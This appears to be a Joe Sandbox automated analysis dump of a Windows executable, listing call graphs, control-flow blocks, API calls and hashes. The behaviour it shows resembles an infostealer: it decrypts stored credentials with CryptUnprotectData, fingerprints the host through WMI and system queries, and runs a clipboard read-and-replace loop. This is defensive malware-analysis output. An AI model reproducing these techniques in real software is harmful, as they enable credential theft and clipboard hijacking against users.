427adb 13638->13639 13641 43d460 RtlAllocateHeap 13638->13641 13647 43d6b0 13639->13647 13640->13638 13668 43f050 LdrInitializeThunk 13640->13668 13644 43d569 13641->13644 13643 43d480 RtlFreeHeap 13643->13639 13646 43d59e 13644->13646 13669 43f050 LdrInitializeThunk 13644->13669 13646->13643 13648 43d73e 13647->13648 13649 43d6c1 13647->13649 13648->13604 13649->13648 13670 43f050 LdrInitializeThunk 13649->13670 13652 43da80 13651->13652 13653 43db3e 13652->13653 13671 43f050 LdrInitializeThunk 13652->13671 13653->13604 13655 43dc3e 13655->13653 13672 43f050 LdrInitializeThunk 13655->13672 13657 43f050 LdrInitializeThunk 13658 43db73 13657->13658 13658->13653 13658->13655 13658->13657 13661 43d9dd 13659->13661 13660 43da0e 13660->13609 13661->13660 13673 43f050 LdrInitializeThunk 13661->13673 13664 43d7fe 13663->13664 13665 43d7d6 13663->13665 13664->13608 13665->13664 13674 43f050 LdrInitializeThunk 13665->13674 13667->13615 13668->13638 13669->13646 13670->13648 13671->13658 13672->13653 13673->13660 13674->13664 13676 441ce1 13675->13676 13678 441d9f 13676->13678 13686 43f050 LdrInitializeThunk 13676->13686 13677 44204a 13677->13625 13678->13677 13680 43d460 RtlAllocateHeap 13678->13680 13682 441e17 13680->13682 13681 43d480 RtlFreeHeap 13681->13677 13684 441ede 13682->13684 13687 43f050 LdrInitializeThunk 13682->13687 13684->13681 13685->13625 13686->13678 13687->13684 13688->13627 13689->13634 13690->13631 13691 441cd0 13692 441ce1 13691->13692 13694 441d9f 13692->13694 13701 43f050 LdrInitializeThunk 13692->13701 13693 44204a 13694->13693 13696 43d460 RtlAllocateHeap 13694->13696 13698 441e17 13696->13698 13697 43d480 RtlFreeHeap 13697->13693 13700 441ede 13698->13700 13702 43f050 LdrInitializeThunk 13698->13702 13700->13697 13701->13694 13702->13700 13703 3941000 13704 3941102 13703->13704 13705 3941012 13703->13705 13706 3941030 Sleep 13705->13706 13707 394103a OpenClipboard 13705->13707 13706->13705 13708 39410f9 GetClipboardSequenceNumber 13707->13708 13709 394104a GetClipboardData 13707->13709 13708->13705 13710 39410f3 CloseClipboard 13709->13710 13711 394105a GlobalLock 13709->13711 13710->13708 13711->13710 13712 394106b GlobalAlloc 13711->13712 13714 394109d GlobalLock 13712->13714 13715 39410e9 GlobalUnlock 13712->13715 13716 39410b0 13714->13716 13715->13710 13717 39410b9 GlobalUnlock 13716->13717 13718 39410e0 GlobalFree 13717->13718 13719 39410cb EmptyClipboard SetClipboardData 13717->13719 13718->13715 13719->13715 13719->13718 13857 441310 13858 441330 13857->13858 13859 4413f5 13858->13859 13867 43f050 LdrInitializeThunk 13858->13867 13859->13859 13860 44162b 13859->13860 13861 43d460 RtlAllocateHeap 13859->13861 13863 441456 13861->13863 13866 44156a 13863->13866 13868 43f050 LdrInitializeThunk 13863->13868 13864 43d480 RtlFreeHeap 13864->13860 13866->13864 13867->13859 13868->13866 13720 414057 13721 414071 13720->13721 13722 414089 CreateThread 13721->13722 13724 4140da 13722->13724 13725 4140d5 13722->13725 13732 421ac0 13722->13732 13723 43d480 RtlFreeHeap 13729 4143ab 13723->13729 13728 4140e6 13724->13728 13730 43f050 LdrInitializeThunk 13724->13730 13725->13723 13728->13725 13731 43f050 LdrInitializeThunk 13728->13731 13729->13729 13730->13724 13731->13728 13738 408660 13740 40866f 13738->13740 13739 408917 ExitProcess 13740->13739 13741 408684 GetCurrentProcessId GetCurrentThreadId 13740->13741 13747 4088fb 13740->13747 13742 4086aa 13741->13742 13743 4086ae SHGetSpecialFolderPathW GetForegroundWindow 13741->13743 13742->13743 13744 408768 13743->13744 13745 43d460 RtlAllocateHeap 13744->13745 13746 40886e 13745->13746 13746->13747 13747->13739 13747->13746 13874 40d220 13875 40d230 13874->13875 13878 43a2b0 13875->13878 13877 40d311 13879 43a2e0 CoCreateInstance 13878->13879 13881 43aaf9 13879->13881 13882 43a6e9 SysAllocString 13879->13882 13884 43ab09 GetVolumeInformationW 13881->13884 13885 43a799 13882->13885 13893 43ab27 13884->13893 13886 43a7a1 CoSetProxyBlanket 13885->13886 13887 43aae8 SysFreeString 13885->13887 13888 43a7c1 SysAllocString 13886->13888 13889 43aade 13886->13889 13887->13881 13891 43a880 13888->13891 13889->13887 13891->13891 13892 43a8f1 SysAllocString 13891->13892 13896 43a918 13892->13896 13893->13877 13894 43aac5 SysFreeString SysFreeString 13894->13889 13895 43aabb 13895->13894 13896->13894 13896->13895 13897 43a95f VariantInit 13896->13897 13899 43a9b0 13897->13899 13898 43aaaa VariantClear 13898->13895 13899->13898 13748 420260 13749 4202c0 13748->13749 13750 42026e 13748->13750 13754 420380 13750->13754 13752 42033c 13752->13749 13753 41ea60 LdrInitializeThunk 13752->13753 13753->13749 13755 420390 13754->13755 13756 442320 LdrInitializeThunk 13755->13756 13757 42046f 13756->13757 13758 43a060 13760 43a085 13758->13760 13761 43a105 13760->13761 13767 43f050 LdrInitializeThunk 13760->13767 13763 43a199 13761->13763 13765 43a23f 13761->13765 13766 43f050 LdrInitializeThunk 13761->13766 13763->13765 13768 43f050 LdrInitializeThunk 13763->13768 13766->13761 13767->13760 13768->13763 13769 42db61 13770 42db73 13769->13770 13771 42dbdb GetComputerNameExA 13770->13771 13772 43efe0 13773 43f006 13772->13773 13774 43f025 13772->13774 13775 43f01a 13772->13775 13776 43eff8 13772->13776 13779 43f020 13772->13779 13780 43f00b RtlReAllocateHeap 13773->13780 13778 43d480 RtlFreeHeap 13774->13778 13777 43d460 RtlAllocateHeap 13775->13777 13776->13773 13776->13774 13776->13779 13777->13779 13778->13779 13780->13779 13900 40cca3 CoInitializeSecurity CoInitializeSecurity 13781 42dc65 13782 42dc71 GetComputerNameExA 13781->13782 13784 43f569 13785 43f580 13784->13785 13787 43f5de 13785->13787 13790 43f050 LdrInitializeThunk 13785->13790 13786 43f62e 13787->13786 13791 43f050 LdrInitializeThunk 13787->13791 13790->13787 13791->13786 13792 43636e 13795 436540 13792->13795 13796 43657d GetObjectW 13795->13796 13798 436662 13796->13798 13799 4229f1 13800 4229f3 13799->13800 13801 4229fb 13800->13801 13803 43f050 LdrInitializeThunk 13800->13803 13803->13800 13804 4178f2 13806 417940 13804->13806 13805 417ca9 13805->13805 13806->13805 13807 442320 LdrInitializeThunk 13806->13807 13807->13806 13901 410fb5 13903 410fd1 13901->13903 13905 4151d0 13903->13905 13904 40ec73 13906 4151f0 13905->13906 13906->13906 13907 4421d0 LdrInitializeThunk 13906->13907 13908 41534d 13907->13908 13909 41536f 13908->13909 13910 4153a1 13908->13910 13911 4153cf 13908->13911 13912 442470 LdrInitializeThunk 13908->13912 13913 41537e 13908->13913 13919 415555 13908->13919 13922 4155b7 13908->13922 13924 4156dd 13908->13924 13909->13910 13909->13911 13909->13913 13916 442500 LdrInitializeThunk 13909->13916 13909->13919 13909->13922 13909->13924 13917 442500 LdrInitializeThunk 13910->13917 13911->13913 13914 415727 13911->13914 13911->13919 13911->13922 13911->13924 13926 41575d 13911->13926 13912->13909 13913->13904 13914->13913 13918 442500 LdrInitializeThunk 13914->13918 13914->13926 13915 442470 LdrInitializeThunk 13915->13914 13916->13910 13917->13911 13918->13926 13919->13913 13927 43f050 LdrInitializeThunk 13919->13927 13922->13922 13923 4421d0 LdrInitializeThunk 13922->13923 13923->13924 13924->13913 13924->13914 13924->13915 13924->13926 13925 415a53 CryptUnprotectData 13925->13913 13925->13926 13926->13913 13926->13925 13928 43f050 LdrInitializeThunk 13926->13928 13927->13913 13928->13926 13808 43f6f5 13809 43f716 13808->13809 13812 43f72e 13808->13812 13809->13812 13815 43f050 LdrInitializeThunk 13809->13815 13811 43f78e 13812->13811 13814 43f050 LdrInitializeThunk 13812->13814 13814->13811 13815->13812 13816 42f775 13817 42f7a0 13816->13817 13817->13817 13818 42f8ec GetPhysicallyInstalledSystemMemory 13817->13818 13819 42f920 13818->13819 13819->13819 13820 40cbf7 13821 40cc01 13820->13821 13822 40cc19 13820->13822 13821->13822 13824 43f050 LdrInitializeThunk 13821->13824 13824->13822 13929 42e13a 13931 42e160 13929->13931 13930 42e1fe 13931->13930 13933 43f050 LdrInitializeThunk 13931->13933 13933->13930

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 13 43a2b0-43a2da 14 43a2e0-43a31a 13->14 14->14 15 43a31c-43a333 14->15 16 43a340-43a391 15->16 16->16 17 43a393-43a3d3 16->17 18 43a3e0-43a3fd 17->18 18->18 19 43a3ff-43a41e 18->19 21 43a424-43a42f 19->21 22 43a53c-43a545 19->22 23 43a430-43a4de 21->23 24 43a550-43a569 22->24 23->23 25 43a4e4-43a4fa 23->25 24->24 26 43a56b-43a5cf 24->26 28 43a500-43a529 25->28 27 43a5d0-43a618 26->27 27->27 29 43a61a-43a665 27->29 28->28 30 43a52b-43a538 28->30 31 43a670-43a69e 29->31 30->22 31->31 32 43a6a0-43a6e3 CoCreateInstance 31->32 33 43aaf9-43ab25 call 440ba0 GetVolumeInformationW 32->33 34 43a6e9-43a71a 32->34 39 43ab27-43ab2b 33->39 40 43ab2f-43ab31 33->40 35 43a720-43a76e 34->35 35->35 37 43a770-43a79b SysAllocString 35->37 45 43a7a1-43a7bb CoSetProxyBlanket 37->45 46 43aae8-43aaf5 SysFreeString 37->46 39->40 41 43ab4d-43ab58 40->41 43 43ab71-43ab89 41->43 44 43ab5a-43ab61 41->44 48 43ab90-43abd6 43->48 44->43 47 43ab63-43ab6f 44->47 49 43a7c1-43a7df 45->49 50 43aade-43aae4 45->50 46->33 47->43 48->48 51 43abd8-43ac04 48->51 52 43a7e0-43a801 49->52 50->46 53 43ac10-43ac24 51->53 52->52 54 43a803-43a87f SysAllocString 52->54 53->53 55 43ac26-43ac4e call 41d150 53->55 56 43a880-43a8ef 54->56 61 43ac50-43ac57 55->61 56->56 58 43a8f1-43a91d SysAllocString 56->58 62 43a923-43a945 58->62 63 43aac5-43aad7 SysFreeString * 2 58->63 61->61 64 43ac59-43ac6a 61->64 71 43aabb-43aac1 62->71 72 43a94b-43a94e 62->72 63->50 65 43ab40-43ab47 64->65 66 43ac70-43ac83 call 408090 64->66 65->41 67 43ac88-43ac8f 65->67 66->65 71->63 72->71 73 43a954-43a959 72->73 73->71 74 43a95f-43a9aa VariantInit 73->74 75 43a9b0-43a9c4 74->75 75->75 76 43a9c6-43a9d0 75->76 77 43a9d4-43a9d6 76->77 78 43aaaa-43aab7 VariantClear 77->78 79 43a9dc-43a9e5 77->79 78->71 79->78 80 43a9eb-43a9fc 79->80 81 43a9fe-43aa03 80->81 82 43aa3d 80->82 84 43aa1c-43aa20 81->84 83 43aa3f-43aa67 call 408010 call 408de0 82->83 95 43aa69 83->95 96 43aa6e-43aa7d 83->96 85 43aa22-43aa2b 84->85 86 43aa10 84->86 88 43aa32-43aa36 85->88 89 43aa2d-43aa30 85->89 91 43aa11-43aa1a 86->91 88->91 92 43aa38-43aa3b 88->92 89->91 91->83 91->84 92->91 95->96 97 43aa84-43aaa7 call 408040 call 408020 96->97 98 43aa7f 96->98 97->78 98->97
                              APIs
                              • CoCreateInstance.OLE32(?,00000000,00000001,?,00000000), ref: 0043A6DB
                              • SysAllocString.OLEAUT32(8FD18DDE), ref: 0043A775
                              • CoSetProxyBlanket.COMBASE(5715C651,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043A7B3
                              • SysAllocString.OLEAUT32(8FD18DDE), ref: 0043A804
                              • SysAllocString.OLEAUT32(52985C88), ref: 0043A8F6
                              • VariantInit.OLEAUT32(?), ref: 0043A967
                              • VariantClear.OLEAUT32(?), ref: 0043AAAB
                              • SysFreeString.OLEAUT32(?), ref: 0043AACF
                              • SysFreeString.OLEAUT32(?), ref: 0043AAD5
                              • SysFreeString.OLEAUT32(00000000), ref: 0043AAE9
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                              • String ID: "#$URSP$lnol$tF(D
                              • API String ID: 2485776651-1169441024
                              • Opcode ID: e14678d229c64b028fef8ba7957d335e1bf8f86931af6123ae6456b2055200fa
                              • Instruction ID: 56d32c7a2f7e8a935d4f4ebe3e6b8326856cc1cd26b7aa5aff23d788f715e13e
                              • Opcode Fuzzy Hash: e14678d229c64b028fef8ba7957d335e1bf8f86931af6123ae6456b2055200fa
                              • Instruction Fuzzy Hash: 2742FE72A583408FD314CF29C881B5BBBE2EBC9314F18892DE5D5DB381DA78D805CB96

                              Control-flow Graph

                              APIs
                              • Sleep.KERNELBASE(00000001), ref: 03941032
                              • OpenClipboard.USER32(00000000), ref: 0394103C
                              • GetClipboardData.USER32(0000000D), ref: 0394104C
                              • GlobalLock.KERNEL32(00000000), ref: 0394105D
                              • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 03941090
                              • GlobalLock.KERNEL32 ref: 039410A0
                              • GlobalUnlock.KERNEL32 ref: 039410C1
                              • EmptyClipboard.USER32 ref: 039410CB
                              • SetClipboardData.USER32(0000000D), ref: 039410D6
                              • GlobalFree.KERNEL32 ref: 039410E3
                              • GlobalUnlock.KERNEL32(?), ref: 039410ED
                              • CloseClipboard.USER32 ref: 039410F3
                              • GetClipboardSequenceNumber.USER32 ref: 039410F9
                              Memory Dump Source
                              • Source File: 00000004.00000002.2540095947.0000000003941000.00000020.00000800.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                              • Associated: 00000004.00000002.2539938506.0000000003940000.00000002.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 00000004.00000002.2540116458.0000000003942000.00000002.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_3940000_EZsrFTi.jbxd
                              Similarity
                              • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                              • String ID:
                              • API String ID: 1416286485-0
                              • Opcode ID: 95c62791fbd6349465e270da8408e400fa451c43abc1d23406c560e2a8371932
                              • Instruction ID: 58ea3efde3524e0ea541d5f4ee18b50d0aa977ffd4bfc84db00ceec0c44cd028
                              • Opcode Fuzzy Hash: 95c62791fbd6349465e270da8408e400fa451c43abc1d23406c560e2a8371932
                              • Instruction Fuzzy Hash: E12186356082509BDB207BB2AC09F6AB7BCFF04FC5F080828F985DA154F7618880C7A1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 125 4243a0-4243f3 126 424400-42442d 125->126 126->126 127 42442f-42446e RtlExpandEnvironmentStrings 126->127 128 424470-424482 127->128 128->128 129 424484-42448e 128->129 130 4244f2-4244fe 129->130 131 424772-42477c 129->131 132 4244d4-4244da call 408020 129->132 133 4245f4-4245fd 129->133 134 4245e4-4245eb 129->134 135 424784 129->135 136 424495-42449b 129->136 137 4244ff-424508 129->137 138 42479f-424846 129->138 139 4244cc 129->139 140 4244dd-4244e2 129->140 131->135 132->140 146 424606 133->146 147 4245ff-424604 133->147 134->133 148 4244a4 136->148 149 42449d-4244a2 136->149 144 424511 137->144 145 42450a-42450f 137->145 142 424850-424862 138->142 139->132 143 4244f0 140->143 142->142 151 424864-424874 call 4208a0 142->151 152 424518-42454f call 408010 144->152 145->152 153 42460d-4246b3 call 408010 146->153 147->153 154 4244a7-4244c5 call 408010 RtlExpandEnvironmentStrings 148->154 149->154 159 424879-42487c 151->159 163 424550-424562 152->163 164 4246c0-4246f7 153->164 154->131 154->132 154->133 154->134 154->135 154->137 154->138 154->139 154->140 165 424884-42489f 154->165 166 42478a-424790 call 408020 154->166 159->165 163->163 169 424564-42456c 163->169 164->164 170 4246f9-424701 164->170 167 4248a0-4248ce 165->167 189 424799 166->189 167->167 171 4248d0-424958 167->171 173 424591-42459d 169->173 174 42456e-424573 169->174 175 424703-42470a 170->175 176 424721-42472d 170->176 182 424960-424982 171->182 177 4245c1-4245cc call 442320 173->177 178 42459f-4245a3 173->178 183 424580-42458f 174->183 179 424710-42471f 175->179 180 424751-42476b call 442320 176->180 181 42472f-424733 176->181 190 4245d1-4245dd 177->190 184 4245b0-4245bf 178->184 179->176 179->179 180->130 180->131 180->132 180->135 180->140 180->143 180->165 180->166 180->189 193 4249af 180->193 194 4249b5-4249be call 408020 180->194 186 424740-42474f 181->186 182->182 188 424984-4249a7 call 4204a0 182->188 183->173 183->183 184->177 184->184 186->180 186->186 188->193 190->130 190->131 190->132 190->133 190->134 190->135 190->138 190->140 190->143 190->165 190->166 190->189 190->193 190->194
                              APIs
                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00424461
                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004244BA
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: EnvironmentExpandStrings
                              • String ID: # $F)K+$Q9V;$TU$pv$ur$y5W7$fgd
                              • API String ID: 237503144-2482526074
                              • Opcode ID: 15881eec6523358e72e2a38f1772edb67c9865b2e4cfb01063704cac48e208fd
                              • Instruction ID: 9b969abbfb61b1180e899b8766ecf73613ac9e1c34624ad5fd4af89b2b200271
                              • Opcode Fuzzy Hash: 15881eec6523358e72e2a38f1772edb67c9865b2e4cfb01063704cac48e208fd
                              • Instruction Fuzzy Hash: F9E1FCB46083509FD310DF25E88126BBBE1FFC6354F44892DE5D58B3A1E7788906CB8A

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: Object$DeleteMetricsSelectSystem
                              • String ID: $(_C$GcC$L_C
                              • API String ID: 3911056724-3722904623
                              • Opcode ID: 29d77c99969483fb244be614ac9c1322d8b44aee47f6fb0feb21f81443337929
                              • Instruction ID: 939e2abe954a277f941e215ea0a71bf6c9de2423ef30fb46f3b6c37421bd8d62
                              • Opcode Fuzzy Hash: 29d77c99969483fb244be614ac9c1322d8b44aee47f6fb0feb21f81443337929
                              • Instruction Fuzzy Hash: 938145B04197808FE760EF65D58878FBBF0BB85708F11891EE4D88B250DBB95958CF4A

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 207 4151d0-4151ea 208 4151f0-4151fb 207->208 208->208 209 4151fd-41520f 208->209 210 415211-415216 209->210 211 415218 209->211 212 41521b-415277 call 408010 210->212 211->212 215 415280-4152d6 212->215 215->215 216 4152d8-4152e4 215->216 217 415301-415311 216->217 218 4152e6-4152eb 216->218 220 415331-415355 call 4421d0 217->220 221 415313-41531a 217->221 219 4152f0-4152ff 218->219 219->217 219->219 225 415540-415546 call 408020 220->225 226 4155c0-4155c8 220->226 227 415702 220->227 228 415384-4153a4 call 408010 call 442500 220->228 229 4153e4-4153ef 220->229 230 415708-41570e call 408020 220->230 231 4156ec 220->231 232 41554f 220->232 233 4155b1 220->233 234 415711-415731 call 442470 220->234 235 4153b0-4153cf call 408010 call 442500 220->235 236 4156f2-4156f8 call 408020 220->236 237 415555-41555b call 408020 220->237 238 4155b7-4155bd call 408020 220->238 239 4153d8-4153dd 220->239 240 4156fb-4156fd 220->240 241 41535c-415377 call 442470 220->241 242 41555e-415566 220->242 243 41537e 220->243 222 415320-41532f 221->222 222->220 222->222 225->232 245 4155d1-4155d5 226->245 246 4155ca-4155cf 226->246 228->235 262 4153f0-4153f9 229->262 230->234 254 4157a0 234->254 255 4157a2-4157aa 234->255 256 41576c 234->256 257 415790-415796 call 408020 234->257 258 415774-415788 call 401000 234->258 259 415799-41579f 234->259 260 415738-415765 call 408010 call 442500 234->260 294 415aa2-415b04 234->294 295 4158b7-4158b9 234->295 296 415a7d 234->296 235->239 236->240 237->242 238->226 239->225 239->226 239->227 239->229 239->230 239->231 239->232 239->234 239->236 239->237 239->238 239->240 239->242 239->254 239->255 239->256 239->257 239->258 239->259 239->260 261 417d75-417d7c 240->261 241->225 241->226 241->227 241->228 241->229 241->230 241->231 241->232 241->234 241->235 241->236 241->237 241->238 241->239 241->240 241->242 241->243 242->233 253 415568-415577 242->253 266 4155d8-415631 call 408010 245->266 246->266 277 415580-415587 253->277 272 4157eb-415843 call 401a90 255->272 273 4157ac-4157bb 255->273 256->258 257->259 258->257 259->254 260->254 260->255 260->256 260->257 260->258 260->259 260->294 260->295 260->296 262->262 278 4153fb-4153fe 262->278 312 415640-41565a 266->312 315 415850-41588d 272->315 287 4157c0-4157c7 273->287 289 415590-415597 277->289 290 415589-41558c 277->290 292 415400-415405 278->292 293 415407 278->293 301 4157d0-4157d7 287->301 302 4157c9-4157cc 287->302 289->233 306 415599-4155a8 call 43f050 289->306 290->277 304 41558e 290->304 307 41540a-415487 call 408010 292->307 293->307 298 415b10-415b2a 294->298 308 4158c0-4158c6 295->308 318 415a87-415a90 call 408020 296->318 298->298 311 415b2c-415b4d call 401db0 298->311 301->272 314 4157d9-4157e8 call 43f050 301->314 302->287 313 4157ce 302->313 304->233 306->233 334 415490-4154c0 307->334 308->308 309 4158c8-4158d9 308->309 319 4158e0 309->319 320 4158db-4158de 309->320 311->254 311->255 311->256 311->257 311->258 311->259 311->294 311->295 311->296 311->318 337 415a93-415a98 311->337 340 415aa0 311->340 341 415d46-415d5f call 440ba0 311->341 342 415d3d-415d43 call 408020 311->342 343 415b7c-415b8a 311->343 312->312 322 41565c-41566a 312->322 313->272 314->272 315->315 324 41588f-4158b0 call 401db0 315->324 318->337 328 4158e1-4158ed 319->328 320->319 320->328 330 415691-4156a1 322->330 331 41566c-415671 322->331 324->294 324->295 324->296 324->343 338 4158f4 328->338 339 4158ef-4158f2 328->339 345 4156c1-4156e5 call 4421d0 330->345 346 4156a3-4156aa 330->346 344 415680-41568f 331->344 334->334 336 4154c2-4154cc 334->336 348 4154f1-415501 336->348 349 4154ce-4154d5 336->349 337->340 350 4158f5-41590f call 408010 338->350 339->338 339->350 341->261 342->341 351 415b90-415b99 343->351 344->330 344->344 345->227 345->230 345->231 345->234 345->236 345->240 345->254 345->255 345->256 345->257 345->258 345->259 345->260 345->294 345->295 345->296 352 4156b0-4156bf 346->352 357 415523 348->357 358 415503-41550f 348->358 356 4154e0-4154ef 349->356 372 415915-415919 350->372 373 415a17-415a76 call 440ba0 CryptUnprotectData 350->373 351->351 360 415b9b-415b9e 351->360 352->345 352->352 356->348 356->356 365 415527-41553a call 408bb0 357->365 364 415510-41551f 358->364 367 415ba4-415ba9 360->367 368 415c67 360->368 364->364 370 415521 364->370 365->225 374 415c6a-415ca3 call 408010 367->374 368->374 370->365 376 415937-415983 call 41c2e0 * 2 372->376 373->294 373->296 373->318 373->337 373->340 373->341 373->342 373->343 383 415cb0-415cca 374->383 389 415920-415931 376->389 390 415985-41599c call 41c2e0 376->390 383->383 385 415ccc-415cd4 383->385 387 415cf1-415d01 385->387 388 415cd6-415cdb 385->388 392 415d21-415d37 call 408bb0 387->392 393 415d03-415d0a 387->393 391 415ce0-415cef 388->391 389->373 389->376 390->389 399 41599e-4159c7 390->399 391->387 391->391 392->342 395 415d10-415d1f 393->395 395->392 395->395 399->389 400 4159cd-4159e6 call 41c2e0 399->400 400->389 403 4159ec-415a12 400->403 403->389
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID: >$Fi$JHN]$]aYZ
                              • API String ID: 0-3243553792
                              • Opcode ID: 8d738d2bcdff36ad1d5c740b921475c16bdeb39ef9e774aeea09ca062810d6b7
                              • Instruction ID: 258e40e84935e2f74b1ea95da3467c58c55d078b3bcd9439a258591578239775
                              • Opcode Fuzzy Hash: 8d738d2bcdff36ad1d5c740b921475c16bdeb39ef9e774aeea09ca062810d6b7
                              • Instruction Fuzzy Hash: 334202B5A08740CFD7209F24D8916ABB7E5EFC6314F544A2DE4C987392EB389845CB4B

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 404 408660-408671 call 43e580 407 408917-408919 ExitProcess 404->407 408 408677-40867e call 437920 404->408 411 408912 call 43efc0 408->411 412 408684-4086a8 GetCurrentProcessId GetCurrentThreadId 408->412 411->407 413 4086aa-4086ac 412->413 414 4086ae-408762 SHGetSpecialFolderPathW GetForegroundWindow 412->414 413->414 416 408825-408832 414->416 417 408768-408822 414->417 418 408840-408863 416->418 417->416 418->418 419 408865-408891 call 43d460 418->419 422 4088a0-4088bc 419->422 423 4088d6-4088f4 call 409bb0 422->423 424 4088be-4088d4 422->424 427 408900-408907 423->427 428 4088f6 call 40c9b0 423->428 424->422 427->411 430 408909-40890f call 408020 427->430 431 4088fb call 40b6e0 428->431 430->411 431->427
                              APIs
                              • GetCurrentProcessId.KERNEL32 ref: 00408684
                              • GetCurrentThreadId.KERNEL32 ref: 0040868E
                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408745
                              • GetForegroundWindow.USER32 ref: 0040875A
                              • ExitProcess.KERNEL32 ref: 00408919
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                              • String ID:
                              • API String ID: 4063528623-0
                              • Opcode ID: 505ab68f1acaa9016c15f56ce89f0fd76322966980eb84c9fd08dbfa51d826f3
                              • Instruction ID: 3c875975a44dbf145db3735e21f42f09af7a4ff13f100e4fc942dee4f10975a0
                              • Opcode Fuzzy Hash: 505ab68f1acaa9016c15f56ce89f0fd76322966980eb84c9fd08dbfa51d826f3
                              • Instruction Fuzzy Hash: 37517BB7E443145BD3187FA98D9636AB6D5ABC8320F0F813EA894EB3D1ED7D4C015289

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 435 42f775-42f795 436 42f7a0-42f7c9 435->436 436->436 437 42f7cb-42f7d2 436->437 438 42f7d4-42f7d8 437->438 439 42f7eb-42f811 437->439 440 42f7e0-42f7e9 438->440 442 42f820-42f84e 439->442 440->439 440->440 442->442 443 42f850-42f857 442->443 444 42f859-42f85f 443->444 445 42f89d 443->445 446 42f860-42f869 444->446 447 42f89f-42f8ab 445->447 446->446 450 42f86b 446->450 448 42f8c1-42f91f call 440ba0 GetPhysicallyInstalledSystemMemory 447->448 449 42f8ad-42f8af 447->449 455 42f920-42f93a 448->455 451 42f8b0-42f8bd 449->451 450->447 451->451 453 42f8bf 451->453 453->448 455->455 456 42f93c-42f975 call 41d150 455->456 459 42f980-42f9a7 456->459 459->459 460 42f9a9-42f9b0 459->460 461 42f9b2-42f9b8 460->461 462 42f9cd 460->462 464 42f9c0-42f9c9 461->464 463 42f9cf-42f9d7 462->463 465 42f9eb-42f9f8 463->465 466 42f9d9-42f9da 463->466 464->464 467 42f9cb 464->467 469 42f9fa-42fa01 465->469 470 42fa1b-42fa6a 465->470 468 42f9e0-42f9e9 466->468 467->463 468->465 468->468 471 42fa10-42fa19 469->471 472 42fa70-42fa82 470->472 471->470 471->471 472->472 473 42fa84-42fa8b 472->473 474 42faab-42fab8 473->474 475 42fa8d-42fa91 473->475 477 42faba-42fac1 474->477 478 42fadb-42fb7e 474->478 476 42faa0-42faa9 475->476 476->474 476->476 479 42fad0-42fad9 477->479 479->478 479->479
                              APIs
                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042F8F7
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: InstalledMemoryPhysicallySystem
                              • String ID: ;M$c$uqT^
                              • API String ID: 3960555810-586203720
                              • Opcode ID: 7b429f08fb103b859baa42e63a5d5a27aacf9deea549376b5c309657d032b9c6
                              • Instruction ID: a17f164b552514ff3eab755bb82c2e9a99bb07b9cca01daacd3a5de00d0a6cd0
                              • Opcode Fuzzy Hash: 7b429f08fb103b859baa42e63a5d5a27aacf9deea549376b5c309657d032b9c6
                              • Instruction Fuzzy Hash: CAA1927050C3D08AD335CF2A90503ABBFF1AF97700F9898AEE4D99B392D6794509CB56
                              Strings
                              Memory Dump Source
